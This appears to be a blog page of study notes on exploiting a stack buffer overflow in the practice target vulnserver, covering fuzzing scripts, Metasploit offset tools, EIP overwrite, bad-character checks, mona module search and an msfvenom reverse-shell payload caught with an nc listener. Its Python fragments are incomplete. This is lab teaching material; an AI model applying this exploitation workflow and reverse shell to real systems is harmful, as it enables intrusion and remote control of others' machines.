Swafox Blog
Comment on page

Buffer Overflows


Windows - OS (7-10) vulnserver Immunity Debugger

What is BoF?

Anatomy of memory:
  • Kernel
  • Stack
  • Heap
  • Data
  • Text
Overflowing the Buffer Space in stack and reach other levels allowing to control them

Steps of BoF

  1. 1.
  2. 2.
  3. 3.
    Finding the offset (find the break point)
  4. 4.
    Overwriting the EIP
  5. 5.
    Finding bad characters
  6. 6.
    Finding the Right Module
  7. 7.
    Generating the shellcode
  8. 8.
    Root <->

1. Spiking

Open vulnserver using the debugger to see what breaks and so on
  • From kali
Connect to {ip 9999} using nc Next up we put a bunch of characters to see if we can crash an app using a certain command. generic_send_tcp ^ send a TCP request with our characters and test it Now we create a file {something}.spk and put this in there:
s_string("STATS ");
STATS <- in this case, should be replaced with the command name to make it specific
Command to send the spike: generic_send_tcp {ip} {port} file.spk 0 0 TRUN command appears to be vulnerable

2. Fuzzing

TRUN is vulnerable so we can now attack it Python fuzzing script
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
s.send(('TRUN /.:/' + buffer))
buffer = buffer + "A"*100
print "Fuzzing crashed at %s bytes" % str(len(buffer))

3. Finding the offset

Here we want to find the place which we override with the characters tool: /usr/share/metasploit-framework/exploit/pattern_create.rb Command used:
/usr/share/metasploit-framework/exploit/pattern_create.rb -l 3000
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
Copy the output -> modify the script by replacing offset with the characters and remove the while loop (offset is buffer in the old script) Script should look like this:
import sys,socket
offset = "{output from pattern_create}"
s.send(('TRUN /.:/' + offset))
print "Error connecting to the server"
In the debugger, we could see that 386F4337 appears to be vulnerable Now, let's try something more specific
/usr/share/metasploit-framework/exploit/pattern_offset.rb -l 3000 -q 386F4337
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
# -q emphasizes the target
Output: 2003 <- We can start controlling the EIP with this amount. (Exactly what we wanted)

4. Overwriting the EIP

Editing the script
import sys,socket
shellcode = "A" * 2003 + "B" * 4
# 2003 A - when we start overwriting the EIP
s.send(('TRUN /.:/' + shellcode))
print "Error connecting to the server"

5. Finding Bad Characters

  • google "badchars" -> Bulbsecurity.com
  • Copy-paste the badchars variable
  • Add badchars to the script as a separate varible
  • Add + badchars to shellcode
Look at the debugger hex dump output If something is off - it's a bad character; Lack of bad characters is what we need

6. Finding the right module

Tool: github.com/corelan/mona Save that script to the machine at C:\ProgramFiles(x86)\ImmunityInc\ImmunityDebugger\PyCommands Type !mona modules in the ImmunityDebugger
In kali: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb We want to convert Assembly code to Hex Type command JMP ESP -> take FFE4
Go back to immunity debugger and change !mona modules to !mona find -s "\xff\xe4" -m essfunc.dll
Modify the python script and remove badchars -> Change "B" *4 to "\xaf\x11\x50\x62"

7-8. Generating Shellcode and Getting Root

Tool: msfvenom Command: msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"
Notes on the command:
# set the module = windows reverse tcp
# LHOST & LPORT = kali ip and port
# Exitfunc = for stability
# -b = bad characters (needs to be set or changed accordingly)
Copy and paste the output to our python code
  • Make it a separate varible and add to the shellcode + overflow
  • To be 100% sure, it's good to add + "\x90" * 32 before the `+overflow+
-> Set up nc listener -> Run the script

Additional: BoF templates